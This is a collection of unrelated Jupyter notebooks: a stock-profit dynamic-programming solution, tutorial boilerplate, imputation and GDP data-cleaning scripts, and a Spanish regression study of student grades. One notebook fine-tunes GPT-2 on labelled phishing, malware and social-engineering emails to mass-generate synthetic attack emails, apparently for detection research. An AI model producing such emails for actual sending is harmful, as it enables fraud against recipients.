This notebook was prepared by [Donne Martin](https://github.com/donnemartin). Source and license info is on [GitHub](https://github.com/donnemartin/interactive-coding-challenges). Solution Notebook Problem: Given a list of stock prices on each consecutive day, determine the max profits with k transactions.* [Constraints](Constraints)* [Test Cases](Test-Cases)* [Algorithm](Algorithm)* [Code](Code)* [Unit Test](Unit-Test) Constraints* Is k the number of sell transactions? * Yes* Can we assume the prices input is an array of ints? * Yes* Can we assume the inputs are valid? * No* If the prices are all decreasing and there is no opportunity to make a profit, do we just return 0? * Yes* Should the output be the max profit and days to buy and sell? * Yes* Can we assume this fits memory? * Yes Test Cases* Prices: None or k: None -> None* Prices: [] or k []* Prices: [0, -1, -2, -3, -4, -5] * (max profit, list of transactions) * (0, [])* Prices: [2, 5, 7, 1, 4, 3, 1, 3] k: 3 * (max profit, list of transactions) * (10, [Type.SELL day: 7 price: 3, Type.BUY day: 6 price: 1, Type.SELL day: 4 price: 4, Type.BUY day: 3 price: 1, Type.SELL day: 2 price: 7, Type.BUY day: 0 price: 2]) AlgorithmWe'll use bottom up dynamic programming to build a table.The rows (i) represent the prices.The columns (j) represent the number of transactions (k).T[i][j] = max(T[i][j - 1], prices[j] - price[m] + T[i - 1][m])m = 0...j-1 0 1 2 3 4 5 6 7--------------------------------------| | 2 | 5 | 7 | 1 | 4 | 3 | 1 | 3 |--------------------------------------| 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 || 1 | 0 | 3 | 5 | 5 | 5 | 5 | 5 | 5 || 2 | 0 | 3 | 5 | 5 | 8 | 8 | 8 | 8 || 3 | 0 | 3 | 5 | 5 | 8 | 8 | 8 | 10 |--------------------------------------Optimization:max_diff = max(max_diff, T[i - 1][j - 1] - prices[j - 1])T[i][j] = max(T[i][j - 1], prices[j] + max_diff)Complexity:* Time: O(n * k)* Space: O(n * k) Code
###Code
from enum import Enum # Python 2 users: Run pip install enum34
class Type(Enum):
SELL = 0
BUY = 1
class Transaction(object):
def __init__(self, type, day, price):
self.type = type
self.day = day
self.price = price
def __eq__(self, other):
return self.type == other.type and \
self.day == other.day and \
self.price == other.price
def __repr__(self):
return str(self.type) + ' day: ' + \
str(self.day) + ' price: ' + \
str(self.price)
import sys
class StockTrader(object):
def find_max_profit(self, prices, k):
if prices is None or k is None:
raise TypeError('prices or k cannot be None')
if not prices or k <= 0:
return []
num_rows = k + 1 # 0th transaction for dp table
num_cols = len(prices)
T = [[None] * num_cols for _ in range(num_rows)]
for i in range(num_rows):
for j in range(num_cols):
if i == 0 or j == 0:
T[i][j] = 0
continue
max_profit = -sys.maxsize
for m in range(j):
profit = prices[j] - prices[m] + T[i - 1][m]
if profit > max_profit:
max_profit = profit
T[i][j] = max(T[i][j - 1], max_profit)
return self._find_max_profit_transactions(T, prices)
def find_max_profit_optimized(self, prices, k):
if prices is None or k is None:
raise TypeError('prices or k cannot be None')
if not prices or k <= 0:
return []
num_rows = k + 1
num_cols = len(prices)
T = [[None] * num_cols for _ in range(num_rows)]
for i in range(num_rows):
max_diff = prices[0] * -1
for j in range(num_cols):
if i == 0 or j == 0:
T[i][j] = 0
continue
max_diff = max(
max_diff,
T[i - 1][j - 1] - prices[j - 1])
T[i][j] = max(
T[i][j - 1],
prices[j] + max_diff)
return self._find_max_profit_transactions(T, prices)
def _find_max_profit_transactions(self, T, prices):
results = []
i = len(T) - 1
j = len(T[0]) - 1
max_profit = T[i][j]
while i != 0 and j != 0:
if T[i][j] == T[i][j - 1]:
j -= 1
else:
sell_price = prices[j]
results.append(Transaction(Type.SELL, j, sell_price))
profit = T[i][j] - T[i - 1][j - 1]
i -= 1
j -= 1
for m in range(j + 1)[::-1]:
if sell_price - prices[m] == profit:
results.append(Transaction(Type.BUY, m, prices[m]))
break
return (max_profit, results)
###Output
_____no_output_____
###Markdown
Unit Test
###Code
%%writefile test_max_profit.py
import unittest
class TestMaxProfit(unittest.TestCase):
def test_max_profit(self):
stock_trader = StockTrader()
self.assertRaises(TypeError, stock_trader.find_max_profit, None, None)
self.assertEqual(stock_trader.find_max_profit(prices=[], k=0), [])
prices = [5, 4, 3, 2, 1]
k = 3
self.assertEqual(stock_trader.find_max_profit(prices, k), (0, []))
prices = [2, 5, 7, 1, 4, 3, 1, 3]
profit, transactions = stock_trader.find_max_profit(prices, k)
self.assertEqual(profit, 10)
self.assertTrue(Transaction(Type.SELL,
day=7,
price=3) in transactions)
self.assertTrue(Transaction(Type.BUY,
day=6,
price=1) in transactions)
self.assertTrue(Transaction(Type.SELL,
day=4,
price=4) in transactions)
self.assertTrue(Transaction(Type.BUY,
day=3,
price=1) in transactions)
self.assertTrue(Transaction(Type.SELL,
day=2,
price=7) in transactions)
self.assertTrue(Transaction(Type.BUY,
day=0,
price=2) in transactions)
print('Success: test_max_profit')
def main():
test = TestMaxProfit()
test.test_max_profit()
if __name__ == '__main__':
main()
%run -i test_max_profit.py
###Output
Success: test_max_profit
|
Sessions/Session10/Day5/model_selection/howto.ipynb | ###Markdown
This notebook is developed as part of the [KIPAC/StatisticalMethods course](https://github.com/KIPAC/StatisticalMethods), (c) 2019 Adam Mantz, licensed under the GPLv2. What's the deal with REPLACE_WITH_YOUR_SOLUTION?Tutorial notebooks from [KIPAC/StatisticalMethods](https://github.com/KIPAC/StatisticalMethods) will all start with these definitions:
###Code
class SolutionMissingError(Exception):
def __init__(self):
Exception.__init__(self,"You need to complete the solution for this code to work!")
def REPLACE_WITH_YOUR_SOLUTION():
raise SolutionMissingError
REMOVE_THIS_LINE = REPLACE_WITH_YOUR_SOLUTION
###Output
_____no_output_____
###Markdown
You'll then see cells that look something like this:
###Code
# Set x equal to something
try:
exec(open('solutions/setx.py').read())
except IOError:
x = REPLACE_WITH_YOUR_SOLUTION()
###Output
_____no_output_____
###Markdown
Go ahead and try to run it. You'll get an error traceback, the end of which points out that you've neglected to provide a solution to the posed problem. This is our preferred method of providing incomplete code, since an alternative like```pythonx = set x equal to something```will throw a different and less informative error if you accidentally run the cell before completing it. The `try`-`except` wrapper is there so that we, the developers, can easily verify that the entire notebook runs if provided with a correct solution. There is no need for you to write solutions for each cell in separate files, and doing so will just make this notebook harder for you to use later. Instead, we suggest removing the `try`-`except` construction entirely, so your completed notebook cell would look like
###Code
# Set x equal to something
x = 5.0
###Output
_____no_output_____
###Markdown
You'll also see cells in this format:
###Code
# Define a function that does stuff
try:
exec(open('solutions/func.py').read())
except IOError:
REMOVE_THIS_LINE()
def myfunc(a, b):
c = REPLACE_WITH_YOUR_SOLUTION()
return REPLACE_WITH_YOUR_SOLUTION()
###Output
_____no_output_____ |
notebooks/4.ipynb | ###Markdown
Text Generate To use gpt2, python version 3.7 or below is required. To install, use : pip install tensorflow==1.15 Don't forget to switch kernel before running
###Code
import gpt_2_simple as gpt2
import os
import requests
import pandas as pd
from tqdm.notebook import tqdm
###Output
WARNING:tensorflow:
The TensorFlow contrib module will not be included in TensorFlow 2.0.
For more information, please see:
* https://github.com/tensorflow/community/blob/master/rfcs/20180907-contrib-sunset.md
* https://github.com/tensorflow/addons
* https://github.com/tensorflow/io (for I/O related ops)
If you depend on functionality not listed there, please file an issue.
###Markdown
Download the model
###Code
model_name = "124M"
if not os.path.isdir(os.path.join("Downloads","models", model_name)):
print(f"Downloading {model_name} model...")
gpt2.download_gpt2(model_dir='Downloads/models', model_name=model_name) # model is saved into current directory under /models/124M/
###Output
Downloading 124M model...
###Markdown
Input Email TTR'ed Dataset
###Code
def grt_txt(file_name,model_name,savepath):
sess = gpt2.start_tf_sess()
gpt2.finetune(sess,
file_name,
model_name=model_name,
model_dir='Downloads/models',
steps=20) # steps is max number of training steps
# Take too much time for large number of steps... Can use 1 to 1000.
for i in tqdm(range(200)):
single_text = gpt2.generate(sess, return_as_list=True)
with open(f'{savepath}/{i}.txt','w') as file:
file.write(single_text[0])
df = pd.read_csv('../data/additional-features-v2/new/additional_features_TTR.tsv',sep='\t')
# text = grt_txt("../tests/test.txt", '124M')
# len(text)
###Output
_____no_output_____
###Markdown
This part is to get the 200 inital emails of each type of attack
###Code
df.columns
types = df[['reconnaissance','social_engineering','malware','credential_phishing']]
types
value1 = types[types.sum(axis=1)==1]
###Output
_____no_output_____
###Markdown
Reconnaissance
###Code
value2_r = types[(types['reconnaissance']==1) & (types.sum(axis=1)==2)]
R1_index = value1[value1['reconnaissance']==1].index
R_list = []
for i in R1_index:
R_list.append(i)
R2_index = value2_r.index
temp = 0
while len(R_list)< 200:
R_list.append(R2_index[temp])
temp += 1
len(R_list)
# R_list is the index of emails with attack reconnaissance
R_txt = df["TTR'ed Text"].loc[R_list]
###Output
_____no_output_____
###Markdown
Social Engineering
###Code
S1_index = value1[value1['social_engineering']==1].index
S_list = []
for i in range(200):
S_list.append(S1_index[i])
len(S_list)
S_txt = df["TTR'ed Text"].loc[S_list]
###Output
_____no_output_____
###Markdown
Malware
###Code
M1_index = value1[value1['malware']==1].index
value2_m = types[(types['malware']==1) & (types.sum(axis=1)==2)]
value3_m = types[(types['malware']==1) & (types.sum(axis=1)==3)]
M_list = []
for i in M1_index:
M_list.append(i)
for j in value2_m.index:
M_list.append(j)
for k in value3_m.index:
if len(M_list) < 200:
M_list.append(k)
else:
break
len(M_list)
M_txt = df["TTR'ed Text"].loc[M_list]
###Output
_____no_output_____
###Markdown
Credential Phishing
###Code
C1_index = value1[value1['credential_phishing']==1].index
C_list = []
for i in C1_index:
if len(C_list)<200:
C_list.append(i)
len(C_list)
C_txt = df["TTR'ed Text"].loc[C_list]
###Output
_____no_output_____
###Markdown
Create Emails txt with different Attack type Delete the existing txt files before re-doing these
###Code
attack=['reconnaissance','social_engineering','malware','credential_phishing']
# Reconnaissance
# with open(f'../data/additional-features-v2/new/attack_Text/reconnaissance.txt','a+') as f:
# for i in R_txt:
# f.write(i)
# Social Engineering
# with open(f'../data/additional-features-v2/new/attack_Text/social_engineering.txt','a+') as f:
# for i in S_txt:
# f.write(i)
# Malware
# with open(f'../data/additional-features-v2/new/attack_Text/malware.txt','a+') as f:
# for i in M_txt:
# f.write(i)
# # Credential_phishing
# with open(f'../data/additional-features-v2/new/attack_Text/Credential_phishing.txt','a+') as f:
# for i in C_txt:
# f.write(i)
###Output
_____no_output_____
###Markdown
Text generating
###Code
grt_txt("../data/additional-features-v2/new/attack_Text/reconnaissance.txt", '124M','../data/additional-features-v2/new/Generated_text/Reconnaissance/')
grt_txt("../data/additional-features-v2/new/attack_Text/social_engineering.txt", '124M','../data/additional-features-v2/new/Generated_text/Social_engineering/')
grt_txt("../data/additional-features-v2/new/attack_Text/malware.txt", '124M','../data/additional-features-v2/new/Generated_text/Malware/')
grt_txt("../data/additional-features-v2/new/attack_Text/Credential_phishing.txt", '124M','../data/additional-features-v2/new/Generated_text/Credential_phishing/')
###Output
_____no_output_____
###Markdown
Impute The Full Dataset
###Code
import numpy as np
from fancyimpute import IterativeImputer
import pandas as pd
df = pd.read_pickle("../data/production/clean_dataset.pickle")
model = df['USDA Model']
df.drop('USDA Model', axis='columns', inplace=True)
XY_incomplete = df.values
XY_completed = []
for i in [435789,36,345668,43432546,327256]:
imputer = IterativeImputer(n_iter=5, sample_posterior=True, random_state=i)
XY_completed.append(imputer.fit_transform(XY_incomplete))
XY_completed_mean = np.mean(XY_completed, 0)
XY_completed_std = np.std(XY_completed, 0)
df.loc[:] = XY_completed_mean
df['USDA Model'] = model
df.to_pickle("../data/production/imputed_dataset.pickle")
df.to_csv("../data/production/imputed_dataset.csv")
###Output
_____no_output_____
###Markdown
Economic Data Processing (MADDISON)>Maddison Project Database, version 2018. Bolt, Jutta, Robert Inklaar, Herman de Jong and Jan Luiten van Zanden (2018), “Rebasing ‘Maddison’: new income comparisons and the shape of long-run economic development”, Maddison Project Working paper 10 Data Dictionary| Full data | Data in single table ||-------------------|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------|| countrycode | 3-letter ISO country code || country | Country name || year | Year || cgdppc | Real GDP per capita in 2011US\$, multiple benchmarks (suitable for cross-country income comparisons) || rgdpnapc | Real GDP per capita in 2011US\$, 2011 benchmark (suitable for cross-country growth comparisons) || pop | Population, mid-year (thousands) || i_cig | 0/1/2: observation is extrapolated (0), benchmark (1), or interpolated (2) || i_bm | For benchmark observations: 1: ICP PPP estimates, 2: Historical income benchmarks, 3: Real wages and urbanization, 4: Multiple of subsistence, 5: Braithwaite (1968) PPPs || Partial countries | Data for selected sub-national units with long time series |
###Code
import pandas as pd
import pycountry
%matplotlib inline
pd.set_option('display.float_format', lambda x: '%.3f' % x)
###Output
_____no_output_____
###Markdown
Load The File
###Code
df = pd.read_excel("../data/external/Economy/MADDISON/mpd2018.xlsx",
sheet_name='Full data')
df.sample(5)
###Output
_____no_output_____
###Markdown
Standardize Country Codes
###Code
""" Only Select rows with valid country codes
"""
country_locations = []
for country in df['countrycode']:
try:
pycountry.countries.lookup(country)
country_locations.append(True)
except LookupError:
country_locations.append(False)
df = df[country_locations]
###Output
_____no_output_____
###Markdown
Standardize Indexes Years (1995≤ x ≥2017)
###Code
df = df[df['year'] >= 1995]
df = df[df['year'] <= 2017]
###Output
_____no_output_____
###Markdown
Reindex & Rename
###Code
df.rename(
{
"year": "Year",
"countrycode": "Country Code",
"cgdppc": "Maddison GDPPC"
},
axis='columns',
inplace=True)
df.set_index(["Country Code", "Year"], inplace=True)
###Output
_____no_output_____
###Markdown
Clean Data Remove unneeded variables
###Code
df.drop(["country", "i_cig", "i_bm", "rgdpnapc", "pop"],
axis='columns',
inplace=True)
###Output
_____no_output_____
###Markdown
Data Types
###Code
df.dtypes
###Output
_____no_output_____
###Markdown
Save Data
###Code
df.to_pickle("../data/processed/Economic_MADDISON.pickle")
###Output
_____no_output_____ |
M2/2_3 y 2_4 MultipleLinearRegression-LASSO-Ridge.ipynb | ###Markdown
Regresión Lineal Múltiple y LASSO Students grades[Source Information](https://www.kaggle.com/hely333/what-is-the-secret-of-academic-success/data)P. Cortez and A. Silva. Using Data Mining to Predict Secondary School Student Performance. In A. Brito and J. Teixeira Eds., Proceedings of 5th FUture BUsiness TEChnology Conference (FUBUTEC 2008) pp. 5-12, Porto, Portugal, April, 2008, EUROSIS, ISBN 978-9077381-39-7.
###Code
# Se cargan las librerías que se van a utilizar
import numpy as np
import math
import matplotlib.pyplot as plt
import pandas as pd
import seaborn as sns
import sklearn
from scipy.optimize import minimize
from sklearn.model_selection import train_test_split
from sklearn.linear_model import Lasso, LassoCV
from sklearn.linear_model import LinearRegression
from sklearn.linear_model import Ridge, RidgeCV
from sklearn.metrics import r2_score
from sklearn.metrics import mean_squared_error
from sklearn.preprocessing import scale
pd.set_option('display.max_columns', 33) # by default is 10, if change to None print ALL
## 1) EXTRAER DATOS
df = pd.read_csv('student_mat.csv')
print(df.shape)
## 2) ANÁLISIS EXPLORATORIO
df.head()
###Output
_____no_output_____
###Markdown
Los datos corresponden a 395 estudiantes de 15 a 22 años que están en un curso de Matemáticas.La información que se tiene de cada uno de los estudiantes es (33 columnas): - **school :** _GP:_ Gabriel Pereira, _MS:_ Mousinho da Silveira - **sex:** _F:_ female, _M:_ male - **age:** student's age (15-22) - **address:** _U:_ urban, _R:_ rural - **famsize:** 'LE3' - less or equal to 3 or 'GT3' - greater than 3 - **Pstatus:** 'T' - living together or 'A' - apart - **Medu:** mother's education (numeric: 0 - none, 1 - primary education (4th grade), 2 – 5th to 9th grade, 3 – secondary education or 4 – higher education) - **Fedu:** father's education (numeric: 0 - none, 1 - primary education (4th grade), 2 – 5th to 9th grade, 3 – secondary education or 4 – higher education) - **Mjob:** mother's job (nominal: 'teacher', 'health' care related, civil 'services' (e.g. administrative or police), 'at_home' or 'other') - **Fjob:** father's job (nominal: 'teacher', 'health' care related, civil 'services' (e.g. administrative or police), 'at_home' or 'other') - **reason:** reason to choose this school (nominal: close to 'home', school 'reputation', 'course' preference or 'other') - **guardian:** student's guardian (nominal: 'mother', 'father' or 'other') - **traveltime:** home to school travel time (numeric: 1 - 4 hours) - **studytime:** weekly study time (numeric: 1 - 10 hours) - **failures:** number of past class failures (numeric: n if 1<=n<3, else 4) - **schoolsup:** extra educational support (binary: yes or no) - **famsup:** family educational support (binary: yes or no) - **paid:** extra paid classes within the course subject (Math) (binary: yes or no) - **activities:** extra-curricular activities (binary: yes or no) - **nursery:** attended nursery school (binary: yes or no) - **higher:** wants to take higher education (binary: yes or no) - **internet:** Internet access at home (binary: yes or no) - **romantic:** with a romantic relationship (binary: yes or no) - **famrel:** quality of family relationships (numeric: from 1 - very bad to 5 - excellent) - **freetime:** free time after school (numeric: from 1 - very low to 5 - very high) - **goout:** going out with friends (numeric: from 1 - very low to 5 - very high) - **Dalc:** workday alcohol consumption (numeric: from 1 - very low to 5 - very high) - **Walc:** weekend alcohol consumption (numeric: from 1 - very low to 5 - very high) - **health:** current health status (numeric: from 1 - very bad to 5 - very good) - **absences:** number of school absences (numeric: from 0 to 93) - **G1:** first period grade (numeric: from 0 to 20) - **G2:** second period grade (numeric: from 0 to 20) - **G3:** final grade (numeric: from 0 to 20, output target) Se busca estimar la calificación final: _G3_.<!--- - **school :** Escuela a la que pertenecen los estudiantes. _GP:_ Gabriel Pereira, _MS:_ Mousinho da Silveira. - **sex:** _F:_ femenino, _M:_ masculino. - **age:** Variable numérica (15-22). - **address:** _U:_ Zona urbana, _R:_ Zona rural. - **famsize:** Tamaño de la familia. _LE3:_ Si 3. - **Pstatus:** T: Si vive con sus padres, A: Si vive aparte. - **Medu:** Educación de la madre. 0 - none, 1 - primary education (4th grade), 2 – 5th to 9th grade, 3 – secondary education or 4 – higher education - **Fedu:** Educación del padre.https://www.kaggle.com/gemartin/average-ensemble-optimization-->
###Code
# Se cuenta el número de NaN's por columna
df.isnull().sum()
# Se definen las varibles X (predictoras) y Y (dependiente)
Y = df.G3
X = df.drop(['G3'], axis = 1)
X.head()
# Matriz de correlación
corr = df.corr()
#corr
ax = sns.heatmap(
corr,
vmin=-1, vmax=1, center=0,
cmap=sns.diverging_palette(20, 220, n=200),
square=True
)
###Output
_____no_output_____
###Markdown
Antes de convertir las variables categóricas a variables dummies, vamos a ver algunas gráficas para decidir cuáles vamos a utilizar en la regresión.
###Code
## 3) VISUALIZACIÓN DE LOS DATOS
#Histograma de la frecuencia relativa del salario con la densidad ajustada correspondiente.
sns.distplot(Y)
plt.title('Histograma de la frecuencia relativa de las calificaciones')
plt.xlabel('Calificaciones')
plt.ylabel('Frecuencia relativa')
print(df['sex'].value_counts())
sns.countplot(x='sex', data=df)
plt.show()
print(df['age'].value_counts())
sns.countplot(x='age', data=df)
plt.show()
print(df['address'].value_counts())
sns.countplot(x='address', data=df)
plt.show()
sns.countplot(x='age', hue='Pstatus', data=df)
plt.title('Estudiantes viviendo con o sin sus padres por edad')
plt.xlabel('A = No viven con sus padres, T = Si viven con sus padres')
plt.ylabel('Número de estudiantes')
plt.show()
# numeric: 0 - none, 1 - primary education (4th grade), 2 – 5th to 9th grade, 3 – secondary education or 4 – higher education
print(df['Medu'].value_counts())
sns.countplot(x='Medu', data=df)
plt.show()
# numeric: 0 - none, 1 - primary education (4th grade), 2 – 5th to 9th grade, 3 – secondary education or 4 – higher education
print(df['Fedu'].value_counts())
sns.countplot(x='Fedu', data=df)
plt.show()
# (nominal: 'teacher', 'health' care related, civil 'services' (e.g. administrative or police), 'at_home' or 'other')
print(df['Mjob'].value_counts())
sns.countplot(x='Mjob', data=df)
plt.show()
# (nominal: 'teacher', 'health' care related, civil 'services' (e.g. administrative or police), 'at_home' or 'other')
print(df['Fjob'].value_counts())
sns.countplot(x='Fjob', data=df)
plt.show()
# numeric: 0 - none, 1 - primary education (4th grade), 2 – 5th to 9th grade, 3 – secondary education or 4 – higher education
sns.countplot(x='Mjob', hue='Medu', data=df)
plt.title('Trabajo y educación de las mamás de los estudiantes')
plt.xlabel('Trabajo')
plt.ylabel('Número de estudiantes')
plt.show()
sns.countplot(x='Fjob', hue='Fedu', data=df)
plt.title('Trabajo y educación de los papás de los estudiantes')
plt.xlabel('Trabajo')
plt.ylabel('Número de estudiantes')
plt.show()
# reason to choose this school (nominal: close to 'home', school 'reputation', 'course' preference or 'other')
print(df['reason'].value_counts())
sns.countplot(x='reason', data=df)
plt.show()
print(df['guardian'].value_counts())
sns.countplot(x='guardian', data=df)
plt.show()
sns.countplot(x='guardian', hue='age', data=df)
plt.title('Guardianes de los estudiantes')
plt.xlabel('Guardián')
plt.ylabel('Número de estudiantes')
plt.show()
sns.countplot(x='traveltime', hue='address', data=df)
plt.title('Horas de camino por lugar de residencia')
plt.xlabel('U = Zona Urbana, R = Zona Rural')
plt.ylabel('Número de estudiantes')
plt.show()
sns.countplot(x='studytime', hue='address', data=df)
plt.title('Horas de estudio por lugar de residencia')
plt.xlabel('U = Zona Urbana, R = Zona Rural')
plt.ylabel('Número de estudiantes')
plt.show()
print(df['failures'].value_counts())
sns.countplot(x='failures', data=df)
plt.show()
sns.countplot(x='age', hue='failures', data=df)
plt.title('Número de clases reprobadas por edad')
plt.xlabel('Edad')
plt.ylabel('Número de estudiantes')
plt.show()
print(df['schoolsup'].value_counts())
sns.countplot(x='schoolsup', data=df)
plt.show()
print(df['famsup'].value_counts())
sns.countplot(x='famsup', data=df)
plt.show()
print(df['paid'].value_counts())
sns.countplot(x='paid', data=df)
plt.show()
print(df['activities'].value_counts())
sns.countplot(x='activities', data=df)
plt.show()
sns.countplot(x='address', hue='activities', data=df)
plt.title('Actividades por lugar de residencia')
plt.xlabel('U = Zona Urbana, R = Zona Rural')
plt.ylabel('Número de estudiantes')
plt.show()
print(df['nursery'].value_counts())
sns.countplot(x='nursery', data=df)
plt.show()
print(df['higher'].value_counts())
sns.countplot(x='higher', data=df)
plt.show()
sns.countplot(x='address', hue='internet', data=df)
plt.title('Internet por lugar de residencia')
plt.xlabel('U = Zona Urbana, R = Zona Rural')
plt.ylabel('Número de estudiantes')
plt.show()
sns.countplot(x='age', hue='romantic', data=df)
plt.title('Estudiantes con o sin relación amorosa por edad')
plt.xlabel('Edad')
plt.ylabel('Número de estudiantes')
plt.show()
sns.countplot(x='age', hue='famrel', data=df)
plt.title('Calidad de la relación familiar por edad')
plt.xlabel('Edad')
plt.ylabel('Número de estudiantes')
plt.show()
sns.countplot(x='address', hue='freetime', data=df)
plt.title('Tiempo libre por lugar de residencia')
plt.xlabel('U = Zona Urbana, R = Zona Rural')
plt.ylabel('Número de estudiantes')
plt.show()
#going out with friends (numeric: from 1 - very low to 5 - very high)
#free time after school (numeric: from 1 - very low to 5 - very high)
sns.countplot(x='goout', hue='freetime', data=df)
plt.title('Salir con amigos por Tiempo libre')
plt.xlabel('Salir con amigos')
plt.ylabel('Número de estudiantes')
plt.show()
#going out with friends (numeric: from 1 - very low to 5 - very high)
sns.countplot(x='age', hue='goout', data=df)
plt.title('Salir con amigos por Edad')
plt.xlabel('Edad')
plt.ylabel('Número de estudiantes')
plt.show()
#workday alcohol consumption (numeric: from 1 - very low to 5 - very high)
print(df['Dalc'].value_counts())
sns.countplot(x='Dalc', data=df)
plt.show()
#weekend alcohol consumption (numeric: from 1 - very low to 5 - very high)
print(df['Walc'].value_counts())
sns.countplot(x='Walc', data=df)
plt.show()
#workday alcohol consumption (numeric: from 1 - very low to 5 - very high)
sns.countplot(x='age', hue='Dalc', data=df)
plt.title('Consumo de alcohol entre semana por Edad')
plt.xlabel('Edad')
plt.ylabel('Número de estudiantes')
plt.show()
#weekend alcohol consumption (numeric: from 1 - very low to 5 - very high)
sns.countplot(x='age', hue='Walc', data=df)
plt.title('Consumo de alcohol en fin de semana por Edad')
plt.xlabel('Edad')
plt.ylabel('Número de estudiantes')
plt.show()
#current health status (numeric: from 1 - very bad to 5 - very good)
print(df['health'].value_counts())
sns.countplot(x='health', data=df)
plt.show()
sns.boxplot(x="absences", data=df)
plt.figure(figsize=(12,8))
sns.boxplot(orient="h",data=df[['G1','G2']])
plt.title('Gráficas de caja de calificaciones')
plt.xlabel('Calificaciones')
plt.figure(figsize=(12,8))
plt.title("Calificaciones del primer parcial de acuerdo a las horas de estudio")
sns.boxplot(y="studytime", x="G1", data = df , orient="h")
plt.figure(figsize=(12,8))
plt.title("Calificaciones del segundo parcial de acuerdo a las horas de estudio")
sns.boxplot(y="studytime", x="G2", data = df , orient="h")
plt.figure(figsize=(12,8))
plt.title("Calificaciones finales de acuerdo a las personas que quieren o no seguir estudiando")
sns.boxplot(y="higher", x="G3", data = df , orient="h")
#weekend alcohol consumption (numeric: from 1 - very low to 5 - very high)
#going out with friends (numeric: from 1 - very low to 5 - very high)
sns.countplot(x='goout', hue='Dalc', data=df)
plt.title('Consumo de alcohol entre semana por salidas con amigos')
plt.xlabel('Salir con amigos')
plt.ylabel('Número de estudiantes')
plt.show()
#weekend alcohol consumption (numeric: from 1 - very low to 5 - very high)
sns.countplot(x='goout', hue='Walc', data=df)
plt.title('Consumo de alcohol en fin de semana por salidas con amigos')
plt.xlabel('Salir con amigos')
plt.ylabel('Número de estudiantes')
plt.show()
# Se eliminan las columnas algunas columnas:
print('Antes se tenían ',X.shape[1],' columnas.')
X = X.drop(['school','sex','famsize','Medu','Fedu','Mjob','Fjob','reason','guardian','nursery','higher','famrel'], axis = 1)
print('Ahora se tienen ',X.shape[1],' columnas.')
X.head()
X.describe()
#Se definen las variables dummies para las variables categóricas
dummies = pd.get_dummies(X[['address', 'Pstatus', 'schoolsup','famsup','paid','activities','internet','romantic']])
dummies.head()
#Se reemplazan por las variables dummies
X = X.drop(['address', 'Pstatus', 'schoolsup','famsup','paid','activities','internet','romantic'], axis = 1).astype('float64')
X = pd.concat([X, dummies[['address_U', 'Pstatus_T', 'schoolsup_yes','famsup_yes','paid_yes','activities_yes',
'internet_yes','romantic_yes']]], axis = 1)
print(X.shape[0],' renglones\n',X.shape[1],' columnas')
X.head()
#Se define un nuevo datafram para mostrar la correlación entre las variables
datos = pd.concat([X,Y], axis = 1)
datos.head()
#sns.pairplot(datos)
#Se muestra la correlación entre la calificación y las variables predictivas
for i in [0,4,8,12]:
sns.pairplot(data=datos,
y_vars=['G3'],
x_vars=['G3',X.columns[i], X.columns[i+1], X.columns[i+2],X.columns[i+3]])
plt.show()
#No se muestran las gráficas de las columnas con variables dummies
## 4) DIVIDIR LOS DATOS
X_train, X_test, Y_train, Y_test = train_test_split(X, Y,test_size = 0.2,random_state = 1)
###Output
_____no_output_____
###Markdown
Regresión Lineal Múltiple
###Code
## 5) CONSTRUIR UN MODELO
# En este ejemplo vamos a elegir un modelo de regresión lineal simple para "X_train"
regresor = LinearRegression()
regresor.fit(X_train, Y_train)
## 6) PREDICCIONES
# Se hacen las predicciones con "X_test"
Y_pred_lin = regresor.predict(X_test)
# Se grafican los resultados de la predicción.
plt.scatter(Y_test, Y_pred_lin, color = 'blue')
plt.title('Predicciones')
plt.xlabel('Calificaciones reales')
plt.ylabel('Calificaciones estimadas')
plt.show()
#Se imprimen los valores de los coeficientes
print(pd.Series(regresor.coef_, index = X.columns)) # Valor de los coeficientes
# Se grafican los valores de los coeficientes (betas).
eje_X = range(1,len(regresor.coef_)+1,1)
plt.scatter(eje_X, regresor.coef_, color = 'purple')
plt.title('Betas')
plt.xlabel('Índices')
plt.ylabel('Valor de coeficientes')
plt.show()
###Output
_____no_output_____
###Markdown
7) EVALUACIÓN DEL MODELOVeamos cómo se comporta el modelo:7.1 Calcular $R^{2}$ ajustada $ = 1 - \dfrac{(1 - R^{2}) (n-1)}{n - p - 1}$, donde$R^{2}:$ R cuadrada de los datos$n:$ Número de datos para entrenar al modelo$p:$ Número de variables independientes7.2 Calcular los errores absolutos $(real - estimado)$ y graficarlos7.3 Calcular los errores relativos $\left( \dfrac{\text{real - estimado}}{\text{real}} \right)$ y graficarlos7.4 Graficar valores estimados vs valores reales7.5 Calcular el error cuadrático: $(real − estimado)^{2}$7.6 Calcular el error cuadrático medio: $\dfrac{\displaystyle \sum_{i = 1}^{n} (real_{i} − estimado_{i})^{2}}{n}$
###Code
#7.1 Calcular R^2 ajustada
r_cuad_lin = r2_score(Y_test,Y_pred_lin)
print('R^2 = ',round(r_cuad_lin,3))
#R^2 ajustada
n = len(Y_train)
p = X_train.shape[1]
r_cuad_aj_lin = 1 - (((1-r_cuad_lin)*(n-1))/(n-p-1))
print('n = ',n)
print('p = ',p)
print('R^2_aj = ',round(r_cuad_aj_lin,3))
#7.2 Calcular los errores absolutos (real - estimado) y graficarlos
err_abs = Y_test-Y_pred_lin
plt.scatter(Y_test, err_abs, color = 'blue')
plt.plot(Y_test, np.zeros(len(err_abs)), color = 'midnightblue') #Recta en Y = 0
plt.title('Errores absolutos (real - estimado)')
plt.xlabel('Calificación real')
plt.ylabel('Errores absolutos')
plt.show()
#7.3 Calcular los errores relativos [(real - estimado)/real] y graficarlos
err_rel = err_abs/Y_test
plt.scatter(Y_test, err_rel, color = 'blue')
plt.plot(Y_test, np.zeros(len(err_abs)), color = 'midnightblue') #Recta en Y = 0
plt.title('Errores relativos [(real - estimado)/real]')
plt.xlabel('Calificación real')
plt.ylabel('Errores relativos')
plt.show()
#7.4 Graficar valores estimados vs valores reales
eje_X = range(1,len(Y_test)+1)
plt.plot(eje_X, sorted(Y_test), color = 'black') #Recta de valores reales
plt.plot(eje_X, sorted(Y_pred_lin), color = 'red') #Recta de valores estimados
plt.title('Valores estimados vs valores reales')
plt.xlabel('Índices')
plt.ylabel('Calificación')
plt.show()
#Nota: Tanto los valores reales como los estimados se ordenaron de menor a mayor.
#7.5 Calcular el error cuadrático = (real − estimado)^2
#print(np.around(err_abs,2))
err_cuad = pow(err_abs,2)
#7.6 Calcular el error cuadrático medio = (1/n) * \sum (real − estimado)^2
ECM_lin = mean_squared_error(Y_test, Y_pred_lin)
print(round(ECM_lin,2))
